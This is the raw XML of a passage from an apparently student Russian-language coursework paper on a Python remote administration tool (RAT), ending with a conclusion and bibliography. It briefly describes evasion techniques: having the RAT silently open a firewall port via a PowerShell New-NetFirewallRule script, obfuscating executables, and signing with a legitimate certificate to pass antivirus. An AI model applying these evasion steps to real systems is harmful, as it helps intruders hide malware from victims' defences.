    <w:p w14:paraId="729F24A8" w14:textId="77777777" w:rsidR="007754EA" w:rsidRDefault="007754EA" w:rsidP="007754EA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В качестве меры противодействия </w:t>
      </w:r>
      <w:r w:rsidR="00146762" w:rsidRPr="00146762">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Firewall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidR="00146762" w:rsidRPr="00146762">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00146762">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>после внедрения,</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2256">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>может</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2256">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">исполнить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B2256">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-скрипт, с целью открытия порта, по которому будет происходить подключение к серверу. Команда </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00415513">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>New-NetFirewallRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>позволит</w:t>
      </w:r>
      <w:r w:rsidRPr="00415513">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>исполнить скрипт без подтверждения пользователя, если скрипт будет выполнен от имени администратора</w:t>
      </w:r>
      <w:r w:rsidR="00146762">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4E4474" w14:textId="77777777" w:rsidR="00146762" w:rsidRPr="00415513" w:rsidRDefault="00146762" w:rsidP="007754EA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Ввиду доступности средств разработки сетевых приложений, новые виды угроз продолжают появляться. Объект данной курсовой работы является тому явным примером. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA5070E" w14:textId="77777777" w:rsidR="00425B32" w:rsidRDefault="007754EA" w:rsidP="0098005B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00146762">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Есть </w:t>
      </w:r>
      <w:r w:rsidR="00DB6C2B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>несколько методов противодействия антивирусным средствам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050C9A07" w14:textId="77777777" w:rsidR="00DB6C2B" w:rsidRDefault="00DB6C2B" w:rsidP="0098005B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Если в качестве </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6C2B">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6C2B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">применяется исполняемый код, можно выполнить его </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>обфускацию</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7DAE6C" w14:textId="77777777" w:rsidR="00DB6C2B" w:rsidRDefault="00DB6C2B" w:rsidP="0098005B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Так же для «прохождения» антивирусного барьера можно использовать легитимный цифровой сертификат.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239941B3" w14:textId="77777777" w:rsidR="00DB6C2B" w:rsidRDefault="00DB6C2B">
      <w:pPr>
        <w:spacing w:after="20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497A290C" w14:textId="77777777" w:rsidR="007F4B3A" w:rsidRPr="001C0E58" w:rsidRDefault="00D05DF5" w:rsidP="008D3C85">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc105065729"/>
      <w:r w:rsidRPr="008D3C85">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Заключение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="6E8593F6" w14:textId="77777777" w:rsidR="00420189" w:rsidRDefault="00420189" w:rsidP="00DB6C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="158A4612" w14:textId="77777777" w:rsidR="00420189" w:rsidRDefault="00420189" w:rsidP="00420189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 xml:space="preserve">Средствами языка программирования </w:t>
      </w:r>
      <w:r w:rsidRPr="00420189">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00420189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разработаны программы сервер, клиент, менеджер, представляющие собой масштабируемое средство удалённого администрирования, позволяющее управлять клиентским </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пк</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, посредством взаимодействия с менеджером через сервер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AEE432" w14:textId="77777777" w:rsidR="00D05DF5" w:rsidRPr="00420189" w:rsidRDefault="00420189" w:rsidP="00420189">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00420189">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Рассмотрены</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> базовые принципы защиты от противодействия защите с участием инструментов удалённого администрирования.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D05DF5" w:rsidRPr="005B52F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74755330" w14:textId="77777777" w:rsidR="00BD1F70" w:rsidRPr="00360450" w:rsidRDefault="00D6129A" w:rsidP="00EC67C5">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc91787347"/>
      <w:bookmarkStart w:id="33" w:name="_Toc104228654"/>
      <w:bookmarkStart w:id="34" w:name="_Toc105065730"/>
      <w:r w:rsidRPr="00360450">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>С</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidR="00D05DF5" w:rsidRPr="00360450">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>писок использованных источников</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="5405508C" w14:textId="77777777" w:rsidR="00360450" w:rsidRPr="00420189" w:rsidRDefault="00360450" w:rsidP="00EC67C5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AEFEB4A" w14:textId="77777777" w:rsidR="007F4B3A" w:rsidRPr="005E6671" w:rsidRDefault="00163263" w:rsidP="005E6671">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Угроза использования </w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ICS</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F4B3A" w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– [Электронный ресурс] – Режим доступа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11226D52" w14:textId="77777777" w:rsidR="00163263" w:rsidRDefault="00C750BB" w:rsidP="007A202D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ics</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>cert</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>kaspersky</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ru</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>publications</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>reports</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>/2018/09/20/</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>threats</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>posed</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>by</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>using</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>rats</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>in</w:t>
        </w:r>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ics</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00163263" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70C8AAF1" w14:textId="77777777" w:rsidR="007A202D" w:rsidRPr="007A202D" w:rsidRDefault="007A202D" w:rsidP="007A202D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A202D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Дата доступа: </w:t>
      </w:r>
      <w:r w:rsidR="00163263">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>01</w:t>
      </w:r>
      <w:r w:rsidRPr="007A202D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.0</w:t>
      </w:r>
      <w:r w:rsidR="00163263">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="007A202D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D52DCAE" w14:textId="77777777" w:rsidR="007F4B3A" w:rsidRPr="005E6671" w:rsidRDefault="00873682" w:rsidP="005E6671">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DigitalOcean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F4B3A" w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – [Электронный ресурс] – Режим доступа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE8E63D" w14:textId="77777777" w:rsidR="005E6671" w:rsidRDefault="00C750BB" w:rsidP="005E6671">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="005E6671" w:rsidRPr="006F7721">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://www.digitalocean.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57D582A2" w14:textId="77777777" w:rsidR="005E6671" w:rsidRPr="005E6671" w:rsidRDefault="005E6671" w:rsidP="005E6671">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A202D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Дата доступа: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="007A202D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.0</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="007A202D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.202</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35015DD7" w14:textId="77777777" w:rsidR="005E6671" w:rsidRPr="005E6671" w:rsidRDefault="005E6671" w:rsidP="005E6671">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lewel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>networking</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E6671">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intefrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E6671">
